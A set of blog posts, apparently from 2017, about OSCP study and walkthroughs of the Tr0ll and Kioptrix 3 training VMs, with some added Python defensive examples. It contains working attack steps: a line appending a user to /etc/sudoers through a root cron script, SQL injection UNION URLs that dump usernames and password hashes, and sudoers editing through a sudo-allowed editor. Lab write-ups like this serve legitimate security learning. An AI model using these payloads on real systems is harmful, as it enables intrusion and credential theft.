Monday, March 6, 2017

Learn Penetration Testing A Discord Chat Where Everyone Is The Same!

A few weeks ago I came across a post on reddit.com/r/netsecstudents about a Discord for pen testing. So far I have found this to be a great group of people to chat with and a great resource.

Check it out and join the community.

https://discordapp.com/invite/pWq4cuN

Sunday, February 19, 2017

PWK (OSCP) - So it begins

My 90 days for the PWK course have started.

I have the first 90 pages of the PWK course material completed and have started to perform some intel gathering on the PWK lab environment. I've also watched a good number of the videos so far. I plan to complete all the exercises and document the lab environment. These apply towards the exam, which can help with passing. The passing score is 70 points. Completing both awards up to 10 points. Not a lot, but it's enough to make the difference between a pass and a fail.

I'm a bit overwhelmed because there is a lot here for me to learn. Once I've gotten familiar with the lab environment I'm sure I'll start getting root on these boxes. As I learn I'll take "breaks" from the PWK course and knock out a vulnerable VM or two as time permits.

Tuesday, February 7, 2017

Tr0ll

I heard about this VM on /r/netsecstudents (I forget which post). I figured I would give this one a shot, even if it's meant to be a bit more difficult than the three Kioptrix VMs I've written about so far.

Right off the bat I perform an nmap scan and a nikto scan. Nmap showed a few open ports.

root@kali:~# nmap -T4 -A -v 192.168.0.129

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-07 20:09 EST
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating ARP Ping Scan at 20:09
Scanning 192.168.0.129 [1 port]
Completed ARP Ping Scan at 20:09, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:09
Completed Parallel DNS resolution of 1 host. at 20:09, 0.06s elapsed
Initiating SYN Stealth Scan at 20:09
Scanning 192.168.0.129 [1000 ports]
Discovered open port 21/tcp on 192.168.0.129
Discovered open port 22/tcp on 192.168.0.129
Discovered open port 80/tcp on 192.168.0.129
Completed SYN Stealth Scan at 20:09, 0.05s elapsed (1000 total ports)
Initiating Service scan at 20:09
Scanning 3 services on 192.168.0.129
Completed Service scan at 20:09, 6.03s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.129
NSE: Script scanning 192.168.0.129.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.23s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Nmap scan report for 192.168.0.129
Host is up (0.00020s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:5B:3D:FD (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.001 days (since Tue Feb  7 20:08:02 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.20 ms 192.168.0.129

NSE: Script Post-scanning.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
           Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)



At this point I checked out what a web browser could show. The page source didn't show much:
<html>
<img src=hacker.jpg>
</html>

This is where the nikto scan came in handy.
root@kali:~# nikto -h 192.168.0.129
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.129
+ Target Hostname:    192.168.0.129
+ Target Port:        80
+ Start Time:         2017-02-07 20:11:48 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7536 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2017-02-07 20:12:03 (GMT-5) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#


Checking out 192.168.0.129/secrets (which is pointed out in the robots.txt file) got another meme:


<html>
<img src="troll.jpg">
</html>

/icons/README had (among other things):

Suggested Uses

The following are a few suggestions, to serve as a starting point for ideas.
Please feel free to tweak and rename the icons as you like.

     a.gif
          This might be used to represent PostScript or text layout
          languages.

     alert.black.gif, alert.red.gif
          These can be used to highlight any important items, such as a
          README file in a directory.

     back.gif, forward.gif
          These can be used as links to go to previous and next areas.

     ball.gray.gif, ball.red.gif
          These might be used as bullets.


Going back to the nmap scan, I decided to check out the FTP port by browsing to ftp://192.168.0.129/



This pcap file shows the FTP transfer of secret_stuff.txt. At first I was reading too much into this, thinking I should try to extract the .txt file. I did come across a great blog post showing how to do that, though:
https://shankaraman.wordpress.com/tag/how-to-extract-ftp-files-from-wireshark-packet/


"FTP Data Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P\n\nSucks, you were so close... gotta TRY HARDER!\n)"



sup3rs3cr3tdirlol - a secret directory, huh. Might as well try to find this. On the second try I got it:

192.168.0.129/sup3rs3cr3tdirlol (on the first try I tried sup3rs3cr3t)


Another file to decipher... more trolling. After downloading it I found out the file was an ELF binary.
 

I spent a good amount of time looking up how to edit/view a binary, even spending a decent amount of time in edb. I was looking for a clue, a troll or something at the memory address "0x0856BF".
http://i2.kym-cdn.com/entries/icons/facebook/000/006/725/desk_flip.jpg


As an act of pure luck I decided to try "0x0856BF" as part of a web address.




good_luck/ contained a text file called "which_one_lol.txt":

maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

While this_folder_contains_the_password/ contained a text file called "Pass.txt":

Good_job_:)

The folder name says the password is in the folder, so I guess the password is "Pass.txt" (not Good_job_:)).
At first I thought it was genphlux with "Pass.txt" as the password.
After many more guesses I get in with the username: overflow

After a good bit of looking around I found another clue... maybe even a troll.
Before going further I was kicked out (the 2nd time it happened).

cleaner.py is a Python script that performs "rm -r /tmp/*". The cool thing is that this file has rwx permissions for all users. If the file is edited to grant the user overflow root permissions, then we're set. The catch is that the script needs to run as root to edit the sudoers file, which is a waiting game since the script is already in the crontab.

import os
import sys

# The lines added to cleaner.py; they run the next time root's cron job executes it
try:
    os.system('echo overflow        ALL=(ALL) ALL >> /etc/sudoers ')
except:
    sys.exit()


and we have root!
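As an added example (not from the original post, and not the cleaner.py from the Tr0ll box), here is a small Python audit that flags the condition used above: a cron entry whose script can be modified by users other than root. The crontab text and file names it builds in demo() are constructed for the demo.

```python
"""Audit crontab lines for scripts that non-root users can modify.

Added example, not code from the original post. It detects the Tr0ll condition:
a root cron job running a world-writable script. All paths and crontab text
used in demo() are constructed.
"""
import os
import re
import stat
import tempfile

# System crontab line: min hour dom mon dow USER COMMAND, or @reboot USER COMMAND
CRON_LINE = re.compile(r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")


def modifiable_by_others(path: str, require_root_owner: bool = True) -> bool:
    """True if group/world can write the file, or (optionally) root does not own it."""
    try:
        st = os.stat(path)
    except OSError:
        return False  # nothing there to run, so nothing to flag
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return True   # the cleaner.py case: anyone can rewrite what root will execute
    return require_root_owner and st.st_uid != 0


def audit_crontab(text: str, require_root_owner: bool = True) -> list:
    """Return (cron_user, path) for each absolute path in a command that others could edit."""
    findings = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or "=" in stripped.split()[0]:
            continue  # blank, comment, or VAR=value line
        m = CRON_LINE.match(stripped)
        if not m:
            continue
        for tok in m.group("cmd").split():
            if tok.startswith("/") and modifiable_by_others(tok, require_root_owner):
                findings.append((m.group("user"), tok))
    return findings


def demo() -> list:
    """Constructed crontab: one 0777 script (the Tr0ll pattern) and one 0755 script."""
    d = tempfile.mkdtemp()
    loose = os.path.join(d, "cleaner.py")
    tight = os.path.join(d, "backup.sh")
    for p in (loose, tight):
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
    os.chmod(loose, 0o777)
    os.chmod(tight, 0o755)
    crontab = (
        "SHELL=/bin/sh\n"
        "# m h dom mon dow user command\n"
        f"*/2 * * * * root /usr/bin/python {loose}\n"
        f"@daily root {tight}\n"
    )
    # require_root_owner=False so the demo behaves the same whoever runs it
    return audit_crontab(crontab, require_root_owner=False)


if __name__ == "__main__":
    for user, path in demo():
        print(f"[!] cron runs {path} as {user}; group/world can modify it")
```

On a real host, feed it the contents of /etc/crontab and the files under /etc/cron.d with the default require_root_owner=True.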
-----------------------------------------------------------------------------------------------------------------------------
While searching around I also got the OS version:
cat /proc/version
Linux version 3.13.0-32-generic (buildd@roseapple) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 



There are a few privilege escalation exploits for kernel version 3.13, so I might as well try them as well. Like I've done before, I copy the exploit over to /var/www and get Apache running; this way I can get a copy of it onto the Tr0ll box. I ended up trying four of these before I found one that worked.

There you go. Two ways to get root on this box... once you've fought your way past all the trolling!




Saturday, February 4, 2017

Kioptrix level 3

With another busy week behind me, it's due for another post. Continuing with the Kioptrix series, I've selected Kioptrix 3 for this weekend. After downloading the VM I noticed the readme.txt in the download:

DISCLAIMER!
We at Kioptrix are not responsible for any damaged directly, or indirectly,
caused by using this system. We suggest you do not connect this installation
to the Internet.
It is, after all, a vulnerable setup.
Please keep this in mind when playing the game.

This machine is setup to use DHCP.
Before playing the game, please modify your attacker's hosts file.

<ip>    kioptrix3.com
This challenge contains a Web Application.


If you have any questions, please direct them to:
comms[at]kioptrix.com


Hope you enjoy this challenge.
-Kioptrix Team


My first go at this VM was fraught with frustration. It wasn't until I looked at the readme.txt that I noticed this note about the hosts file. Adding that line does help. To help with things I've started using KeepNote for recording my progress with each vulnerable VM.

After booting up Kioptrix 3 and Kali I start with the usual:

root@kali:~# nmap 192.168.0.198

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-04 21:35 EST
Nmap scan report for 192.168.0.198
Host is up (0.000066s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:C7:D9:56 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

------------------------------------------------------------------------------
root@kali:~# nmap -T4 -A -v 192.168.0.198
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...








Kioptrix 3 has Apache running on it. Let's take a look:


We have a Blog page, a Login page and, if you look at this page, there is a gallery system. For this VM I've also decided to try out a new tool (for me), Nikto.
I also ran a scan on the gallery page:
root@kali:~# nikto -host http://192.168.0.198/gallery
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.198
+ Target Hostname:    192.168.0.198
+ Target Port:        80
+ Start Time:         2017-02-04 19:01:13 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /gallery/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /gallery/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /gallery/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /gallery/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /gallery/db.sql, inode: 630988, size: 3573, mtime: Sat Oct 10 15:43:52 2009
+ OSVDB-3092: /gallery/db.sql: Database SQL?
+ /gallery/login.php: Admin login page/section found.
+ 7534 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2017-02-04 19:01:28 (GMT-5) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested



These two highlighted parts caught my attention. Let's see what they show in the browser:

So I just got the DB structure. I'm going to save this for later. Further down on this page I also get this gem:


CREATE TABLE IF NOT EXISTS `gallarific_users` (
  `userid` int(11) NOT NULL auto_increment,
  `username` varchar(100) NOT NULL default '',
  `password` varchar(100) NOT NULL default '',
  `usertype` enum('superuser','normaluser') NOT NULL default 'superuser',
  `firstname` varchar(100) NOT NULL default '',
  `lastname` varchar(100) NOT NULL default '',
  `email` varchar(255) NOT NULL default '',
  `datejoined` int(11) NOT NULL default '0',
  `website` varchar(255) NOT NULL default '',
  `issuperuser` tinyint(4) NOT NULL default '0',
  `photo` varchar(100) NOT NULL default '',
  `joincode` varchar(20) NOT NULL default '',
  PRIMARY KEY  (`userid`)
);

After clicking on the Press Room I notice a drop-down menu for sorting options. After clicking it I notice 'id' in the URL.

http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos

Throwing in a single quote (http://kioptrix3.com/gallery/gallery.php?id=') into the url returns this error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by parentid,sort,name' at line 1Could not select category

After a lot of playing around I get an SQL injection to work:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20SELECT%201,2,3,4,5,6

Changing the SQL Injection to:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20SELECT%201,@@version,3,4,5,6
    5.0.51a-3ubuntu5.4

Since I've learned the table and column names from earlier I can get the username and password from the DB:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20SELECT%20userid,username,password,4,5,6%20FROM%20gallarific_users

   admin//n0t7t1k4

This could be used for logging into the site, but I don't think this is a dev account. To prove this I tried logging in with this username. No luck. Time to look for another table:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20ALL%20SELECT%201,2,group_concat%28table_name%29,4,5,6%20from%20information_schema.tables

This gets us:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,
SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,dev_accounts,
gallarific_comments,gallarific_galleries,gallarific_photos,gallarific_settings,gallari

Changing my earlier injection to:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20ALL%20SELECT%201,2,concat%28username,char%2858%29,password%29,4,5,6%20FROM%20dev_accounts

loneferret:5badcaf789d3d1d09794d8f021f40f0e
dreg:0d3eccfb887aabd50f243b3f155c0f85
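The following is an added example, not code from the original post or from Gallarific, showing why the id parameter accepts a UNION and how validating and binding the value stops it. SQLite stands in for MySQL, the query shape is assumed from the error message above, and every row is constructed.

```python
"""Why gallery.php?id= accepts a UNION and how parameterisation stops it.

Added example, not code from the original post or from Gallarific. SQLite
stands in for MySQL; the query shape (a numeric id spliced into the SQL,
then ORDER BY parentid,sort,name) is assumed from the error message above,
and every row below is constructed.
"""
import sqlite3

SCHEMA = """
CREATE TABLE categories (id INTEGER, parentid INTEGER, sort INTEGER,
                         name TEXT, col5 TEXT, col6 TEXT);
INSERT INTO categories VALUES (1, 0, 1, 'Press Room', '', '');
CREATE TABLE dev_accounts (id INTEGER, username TEXT, password TEXT);
INSERT INTO dev_accounts VALUES (1, 'devuser', 'constructed-hash-placeholder');
"""
COLUMNS = "id, parentid, sort, name, col5, col6"   # fixed column list, six columns


def open_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, id_param: str):
    """String-built query: whatever arrives in id becomes SQL, as in the page's gallery.php."""
    sql = (f"SELECT {COLUMNS} FROM categories WHERE id={id_param} "
           "ORDER BY parentid,sort,name")
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as e:
        return f"SQL error: {e}"   # the MySQL error shown on the page is this same leak


def hardened_lookup(conn, id_param: str):
    """Validate the type, then bind the value; no user text ever reaches the SQL parser."""
    try:
        cat_id = int(id_param)
    except ValueError:
        return []                  # '1 UNION ...' and a lone quote are both rejected here
    sql = f"SELECT {COLUMNS} FROM categories WHERE id=? ORDER BY parentid,sort,name"
    return conn.execute(sql, (cat_id,)).fetchall()


PAYLOAD = "1 UNION SELECT 1,username,password,4,5,6 FROM dev_accounts"


def demo():
    conn = open_demo_db()
    return {
        "probe":    vulnerable_lookup(conn, "'"),       # error message leaks query shape
        "vuln":     vulnerable_lookup(conn, PAYLOAD),   # dev_accounts row rides along
        "hardened": hardened_lookup(conn, PAYLOAD),     # rejected before any SQL runs
        "normal":   hardened_lookup(conn, "1"),         # legitimate use still works
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The UNION only works because the attacker-controlled SELECT has the same six columns as the original, which is what the 1,2,3,4,5,6 probe on the page was establishing.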

From the blog site loneferret is the new admin for the site. This is the username I want.

I used crackstation.net to crack these hashes.
With the cracked password I try to log in to phpMyAdmin and the LotusCMS login pages, no luck. BUT SSH works:
An ls of loneferret's home directory shows:
checksec.sh and CompanyPolicy.README

checksec.sh description shows:
# Name    : checksec.sh
# Version : 1.4
# Author  : Tobias Klein
# Date    : January 2011
# Download: http://www.trapkit.de/tools/checksec.html
# Changes : http://www.trapkit.de/tools/checksec_changes.txt
#
# Description:
#
# Modern Linux distributions offer some mitigation techniques to make it
# harder to exploit software vulnerabilities reliably. Mitigations such
# as RELRO, NoExecute (NX), Stack Canaries, Address Space Layout
# Randomization (ASLR) and Position Independent Executables (PIE) have
# made reliably exploiting any vulnerabilities that do exist far more
# challenging. The checksec.sh script is designed to test what *standard*
# Linux OS and PaX (http://pax.grsecurity.net/) security features are being
# used.
#
# As of version 1.3 the script also lists the status of various Linux kernel
# protection mechanisms.


CompanyPolicy.README shows:
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
loneferret@Kioptrix3:~$


To get root I need to sudo su, but this isn't allowed at the moment. I need to edit the sudoers file, and ht will do the trick.
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ export TERM=xterm
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers

After a quick Google search of the error I found the answer on this stackoverflow.com page:
http://stackoverflow.com/questions/6804208/nano-error-error-opening-terminal-xterm-256color





I've edited the file so loneferret can do all the things that root can.

loneferret@Kioptrix3:~$ sudo su
[sudo] password for loneferret:
root@Kioptrix3:/home/loneferret# whoami
root
root@Kioptrix3:/home/loneferret# cd
root@Kioptrix3:~# ls
Congrats.txt  ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS:
http://www.lotuscms.org

Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.

root@Kioptrix3:~#